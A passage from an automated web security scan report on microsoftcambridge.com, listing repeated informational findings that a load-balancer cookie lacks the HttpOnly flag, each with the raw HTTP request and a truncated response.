Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; path=/
Last-Modified: Fri, 26 Jun 2009 18:39:17 GMT
X-Cache-Info: caching
Content-Length: 3024

.PNG
.
...IHDR.............s+....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.33. http://microsoftcambridge.com/Portals/0/search_results.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Portals/0/search_results.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=6E444C5C9EE5F0B36535D0D071AE8DCE; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/search_results.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6E444C5C9EE5F0B36535D0D071AE8DCE; path=/
Last-Modified: Fri, 20 Feb 2009 03:31:18 GMT
X-Cache-Info: caching
Content-Length: 5556

.PNG
.
...IHDR...O...!.....YD)l....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.34. http://microsoftcambridge.com/Portals/0/share_icons_new.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Portals/0/share_icons_new.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=DF1FA1E49AC6733F28ECBEF98F896ADD; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/share_icons_new.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=DF1FA1E49AC6733F28ECBEF98F896ADD; path=/
Last-Modified: Mon, 28 Mar 2011 17:48:29 GMT
X-Cache-Info: caching
Content-Length: 7108

.PNG
.
...IHDR..............;......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.35. http://microsoftcambridge.com/Portals/_default/Skins/working/skin.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Portals/_default/Skins/working/skin.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/_default/Skins/working/skin.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/
Last-Modified: Fri, 18 Feb 2011 14:35:44 GMT
X-Cache-Info: caching
Content-Length: 2593

body
{
   background-color: #9a825e;
   background-image: url(/img/microsoft_work_bg.jpg);
   color: #30302e;
}

.header
{
   border-bottom: 4px #4d9f8e solid;
}

.content
{
}

.bottom
{
   background-image: ur
...[SNIP]...

11.36. http://microsoftcambridge.com/Portals/_default/default.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Portals/_default/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=0817D9D7E6BBB58F474E097C28605B0C; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/_default/default.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=0817D9D7E6BBB58F474E097C28605B0C; path=/
Last-Modified: Fri, 18 Feb 2011 14:26:56 GMT
X-Cache-Info: caching
Content-Length: 12186

.../* background color for the content part of the pages */
.ControlPanel, .PagingTable{width:100%;background-color:#fff;border:#036 1px solid;}
.SkinObject{font-weight:bold;font-size:8.5pt;color:#036
...[SNIP]...

11.37. http://microsoftcambridge.com/Resources/Shared/scripts/initWidgets.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Resources/Shared/scripts/initWidgets.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE014483C0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/Shared/scripts/initWidgets.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:32 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE014483C0; path=/
Last-Modified: Thu, 17 Feb 2011 20:35:56 GMT
X-Cache-Info: caching
Content-Length: 1311

function loadWidgets()
{
if (typeof (DotNetNuke) === "undefined")
Type.registerNamespace("DotNetNuke.UI.WebControls");

if (typeof (DotNetNuke.UI.WebControls.Utility) === "undefin
...[SNIP]...

11.38. http://microsoftcambridge.com/css/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE014483C0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/print.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE014483C0; path=/
Last-Modified: Thu, 17 Feb 2011 20:36:19 GMT
X-Cache-Info: caching
Content-Length: 63

.header, .bottom, .right, #dnn_HeaderPane
{
display: none;
}

11.39. http://microsoftcambridge.com/css/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/css/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=6E444C5C9EE5F0B36535D0D071AE8DCE; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/styles.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6E444C5C9EE5F0B36535D0D071AE8DCE; path=/
Last-Modified: Mon, 28 Mar 2011 17:23:35 GMT
X-Cache-Info: caching
Content-Length: 6749

img {border-width: 0;}

p
{
   font-size: 12px;
}

body
{
   background-color: #D9D5C9;
   background-repeat: no-repeat;
   background-position: top center;
   font-family: "Trebuchet MS", Lucida Grande, Lucida
...[SNIP]...

11.40. http://microsoftcambridge.com/img/working/about.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/img/working/about.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/working/about.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; path=/
Last-Modified: Thu, 12 Feb 2009 05:14:48 GMT
X-Cache-Info: caching
Content-Length: 3157

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.41. http://microsoftcambridge.com/img/working/blog.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/img/working/blog.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=D9B96011B17B18DEE4B835347359E29F; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/working/blog.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=D9B96011B17B18DEE4B835347359E29F; path=/
Last-Modified: Mon, 28 Mar 2011 18:00:39 GMT
X-Cache-Info: caching
Content-Length: 2048

.PNG
.
...IHDR...$.........
.......tEXtSoftware.Adobe ImageReadyq.e<...oiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.42. http://microsoftcambridge.com/img/working/community.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/img/working/community.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=FA2B21B8BD8C419458FB5A8E0D432648; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/working/community.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:33 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=FA2B21B8BD8C419458FB5A8E0D432648; path=/
Last-Modified: Thu, 12 Feb 2009 05:14:50 GMT
X-Cache-Info: caching
Content-Length: 3362

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.43. http://microsoftcambridge.com/img/working/events.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/img/working/events.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/working/events.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:33 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/
Last-Modified: Thu, 12 Feb 2009 05:14:57 GMT
X-Cache-Info: caching
Content-Length: 3250

.PNG
.
...IHDR...5.................tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.44. http://microsoftcambridge.com/img/working/people.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/img/working/people.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=24EBA76010C3EBEB313E6B27CEB377D7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/working/people.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:33 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=24EBA76010C3EBEB313E6B27CEB377D7; path=/
Last-Modified: Thu, 12 Feb 2009 05:15:03 GMT
X-Cache-Info: caching
Content-Length: 3146

.PNG
.
...IHDR...6.........).N.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.45. http://microsoftcambridge.com/img/working/teams.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/img/working/teams.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=AF1B58881B49A97D05AC75130FAF612F; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/working/teams.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:33 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=AF1B58881B49A97D05AC75130FAF612F; path=/
Last-Modified: Thu, 12 Feb 2009 05:15:08 GMT
X-Cache-Info: caching
Content-Length: 3211

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.46. http://microsoftcambridge.com/img/working/working.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/img/working/working.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/working/working.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/
Last-Modified: Thu, 12 Feb 2009 05:15:11 GMT
X-Cache-Info: caching
Content-Length: 3653

.PNG
.
...IHDR...l... .............tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.47. http://microsoftcambridge.com/js/dnn.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/dnn.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=FA2B21B8BD8C419458FB5A8E0D432648; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/dnn.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:32 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=FA2B21B8BD8C419458FB5A8E0D432648; path=/
Last-Modified: Thu, 17 Feb 2011 20:35:59 GMT
X-Cache-Info: caching
Content-Length: 17506

...
var DNN_HIGHLIGHT_COLOR='#9999FF';var COL_DELIMITER=String.fromCharCode(18);var ROW_DELIMITER=String.fromCharCode(17);var QUOTE_REPLACEMENT=String.fromCharCode(19);var KEY_LEFT_ARROW=37;var KEY_UP
...[SNIP]...

11.48. http://microsoftcambridge.com/js/dnn.xml.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/js/dnn.xml.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=A7ED7F94DE3B77E48C882DE45E648982; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/dnn.xml.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:32 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A7ED7F94DE3B77E48C882DE45E648982; path=/
Last-Modified: Thu, 17 Feb 2011 20:36:03 GMT
X-Cache-Info: caching
Content-Length: 4461

...
